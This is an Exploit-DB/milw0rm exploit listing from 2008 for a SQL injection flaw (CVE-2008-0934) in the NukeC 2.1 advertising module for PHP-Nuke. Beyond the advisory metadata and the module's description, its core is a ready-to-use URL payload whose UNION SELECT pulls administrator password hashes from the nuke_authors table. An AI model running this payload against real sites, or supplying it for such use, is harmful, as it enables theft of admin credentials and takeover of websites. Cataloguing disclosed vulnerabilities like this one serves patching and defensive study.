PHP-Nuke Module NukeC 2.1 id_catg SQL Injection Vulnerability

2008-02-21T00:00:00
ID EDB-ID:5172
Type exploitdb
Reporter DamaR
Modified 2008-02-21T00:00:00

Description

PHP-Nuke Module NukeC 2.1 (id_catg) SQL Injection Vulnerability. CVE-2008-0934. Webapps exploit for php platform

                                        
                                            =-==-==-==-==-==-==-==D==A==M==A==R==-==-==-==-==-==-==-==-==-==-==-=

PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection

###################################################################################

 

Found: DamaR
contact: By.DamaR@Hotmail.Com

Hack Bitti ama Dönmek Yakın  Since 2000

için yaklaşık 9.080 sonuçtan 1 - 10 arası sonuçlar (0,17 saniye)


###################################################################################

Exploit:

/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2

###################################################################################


Module Copyright © Information
NukeC module for PHP-Nuke


 Module's Name: NukeC
 Module's Version: 2.1
 Module's Description: NukeC - The Advanced Advertising System for PHP-Nuke.
NukeC Addon Module is addon module built for work on PHP-Nuke, the great web portal system.
NukeC is an advertising system that allows website visitors or members to sell something by posting the information about the item that they want to sell. With the admin sections, you could easily manage all of contents and preferences in NukeC Modules eventhough you are not a PHP programmer.
NukeC 2.1 is only work on PHP-Nuke 6.5. Please Download 2.0 or earlier for PHP-Nuke 6.0 or earlier nuke version
 License: GNU/GPL
 Author's Name: Sudirman Angriawan
 Author's Email: nukecpower@yahoo.com


###################################################################################

# milw0rm.com [2008-02-21]